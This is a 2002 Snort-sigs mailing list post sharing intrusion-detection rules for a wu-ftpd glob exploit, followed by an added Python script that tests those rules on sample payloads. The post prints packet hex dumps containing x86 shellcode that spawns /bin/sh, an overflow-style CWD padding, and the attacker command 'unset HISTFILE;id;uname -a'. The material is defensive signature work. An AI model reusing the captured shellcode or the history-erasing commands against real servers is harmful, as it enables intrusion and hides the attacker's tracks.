[Snort-sigs] A few wu-ftpd glob vulnerability rules.

Andreas Östling andreaso at ...58...
Wed Apr 10 04:47:09 EDT 2002


Hello,

I've been constantly hit with some wu-ftpd glob exploit the last couple of
weeks (can anyone name it btw?).

At least the "SHELLCODE x86 EB OC NOOP" and "FTP wu-ftp file completion
attempt {" rules will already catch it (and the "id check returned root"
rule should catch successful ones), but in case someone cares, here are a
few additional rules I find useful to catch this particular exploit.

A few interesting parts of the exploit I want to alert on:

03/26-10:25:51.760411 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33278 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x8EA5CD78  Ack: 0x1CF6FCED  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56099524 49581040
52 4E 46 52 20 2E 2F 2E 2F 0A                    RNFR ././.


03/26-10:26:03.239120 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33364 IpLen:20 DgmLen:560 DF
***AP*** Seq: 0x8EA5D056  Ack: 0x1CF709E1  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56100671 49582172
43 57 44 20 30 30 30 30 30 30 30 30 30 30 30 30  CWD 000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 F0 FC B8 FE 06 08 F8 2C 08 08 EB 0C  0000.......,....
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C 90 90 90 90 90 90 90 90 90 90 90 90  ................
31 DB 43 B8 0B 74 51 0B 2D 01 01 01 01 50 89 E1  1.C..tQ.-....P..
6A 04 58 89 C2 CD 80 EB 0E 31 DB F7 E3 FE CA 59  j.X......1.....Y
6A 03 58 CD 80 EB 05 E8 ED 0A CA 59 6A 03 58 CD  j.X........Yj.X.
80 EB 05 E8 ED FF FF FF FF FF FF 0A              ............


03/26-10:26:05.206213 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33379 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x8EA5D2C1  Ack: 0x1CF70D25  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56100868 49582383
33 DB F7 E3 B0 46 33 C9 CD 80 6A 54 8B DC B0 27  3....F3...jT...'
B1 ED CD 80 B0 3D CD 80 52 B1 10 68 2F 44 E2 F8  .....=..R..h/D..
8B DC B0 3D CD 80 58 6A 54 6A 28 58 CD 80 6A 0B  ...=..XjTj(X..j.
58 99 52 68 6E 2F 73 68 68 2F 2F 62 69 89 E3 52  X.Rhn/shh//bi..R
53 89 E1 CD 80 E1 CD 80                          S.......


03/26-10:26:05.328747 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33382 IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x8EA5D309  Ack: 0x1CF70D26  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56100880 49582396
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 69  unset HISTFILE;i
64 3B 75 6E 61 6D 65 20 2D 61 3B 0A              d;uname -a;.


The rules:

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP RNFR ././"; \
content:"RNFR"; content:"././"; flags:A+;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP EXPLOIT shell attempt"; \
content:"|6E 2F 73 68 68 2F 2F 62 69|"; flags:A+;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP EXPLOIT uname -a"; \
content:"uname -a"; flags:A+;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP large CWD packet"; \
content:"CWD "; dsize:>300; flags:A+;)

(plus flow:to_server; on all of them if you're into that)

I can extract a pcap if anyone is interested.

Regards,
Andreas Östling
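Added example, not part of Andreas's post or of the Snort project: a small Python matcher that parses the four rules above (only their msg, content and dsize options) and applies the same payload checks to a handful of constructed FTP command payloads, so you can see which rule fires on which kind of packet and that dsize:>300 is a strict comparison. The sample payloads are modelled on the captured packets but are not the originals; function and sample names are my own.

```python
import re

# The four Snort rules from the post (backslash line continuations joined).
RULES = [
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP RNFR ././"; '
    'content:"RNFR"; content:"././"; flags:A+;)',
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP EXPLOIT shell attempt"; '
    'content:"|6E 2F 73 68 68 2F 2F 62 69|"; flags:A+;)',
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP EXPLOIT uname -a"; '
    'content:"uname -a"; flags:A+;)',
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP large CWD packet"; '
    'content:"CWD "; dsize:>300; flags:A+;)',
]

# Matches one option inside the rule's parentheses: key:"quoted"; or key:bare;
OPTION_RE = re.compile(r'(\w+)\s*:\s*(?:"([^"]*)"|([^;]*))\s*;')


def parse_content(spec: str) -> bytes:
    """Convert a Snort content string to bytes.

    Text outside |...| is literal; text inside is space-separated hex,
    e.g. 'CWD |30 30|' -> b'CWD 00'.
    """
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def parse_rule(rule: str) -> dict:
    """Extract msg, the content patterns and a dsize:>N threshold from one rule."""
    body = rule[rule.index("(") + 1 : rule.rindex(")")]
    parsed = {"msg": "", "contents": [], "dsize_gt": None}
    for key, quoted, bare in OPTION_RE.findall(body):
        value = quoted if quoted else bare
        if key == "msg":
            parsed["msg"] = value
        elif key == "content":
            parsed["contents"].append(parse_content(value))
        elif key == "dsize" and value.startswith(">"):
            parsed["dsize_gt"] = int(value[1:])  # the post only uses dsize:>N
    return parsed


PARSED_RULES = [parse_rule(r) for r in RULES]


def matching_rules(payload: bytes, rules=None) -> list:
    """Return the msg of every rule whose payload options match.

    Semantics mirrored from Snort for these options: every content: pattern
    must occur somewhere in the payload (case-sensitive, unordered, since the
    rules use no distance/within), and dsize:>N compares the payload length.
    flags:A+ (and flow:to_server) are TCP-level checks, assumed satisfied here.
    """
    rules = PARSED_RULES if rules is None else rules
    hits = []
    for r in rules:
        contents_ok = all(c in payload for c in r["contents"])
        size_ok = r["dsize_gt"] is None or len(payload) > r["dsize_gt"]
        if contents_ok and size_ok:
            hits.append(r["msg"])
    return hits


# Constructed sample payloads (not the captured packets): the RNFR probe, a CWD
# padded with filler, the nine bytes the shell rule looks for, the post-exploit
# command line, plus two ordinary FTP commands that must not fire.
SAMPLE_PAYLOADS = {
    "rnfr_probe": b"RNFR ././\n",
    "long_cwd": b"CWD " + b"0" * 300 + b"\n",
    "shell_bytes": bytes.fromhex("6E2F7368682F2F6269"),
    "post_exploit": b"unset HISTFILE;id;uname -a;\n",
    "benign_cwd": b"CWD /pub/incoming\n",
    "benign_rnfr": b"RNFR old.txt\n",
}


def scan_samples() -> dict:
    """Run every sample payload through the rules: sample name -> list of msgs."""
    return {name: matching_rules(p) for name, p in SAMPLE_PAYLOADS.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:13s} -> {hits or ['(no alert)']}")
```

Running it prints one line per sample; the two benign commands produce no alert, and a CWD payload of exactly 300 bytes does not trip the dsize rule because dsize:>300 is strict. One thing the matcher makes visible: Snort content matches are case-sensitive unless the option carries nocase, while FTP command words are case-insensitive, so adding nocase to the "RNFR", "CWD " and "uname -a" contents makes the rules a little more robust at no real cost (the captured traffic above happens to use upper-case throughout).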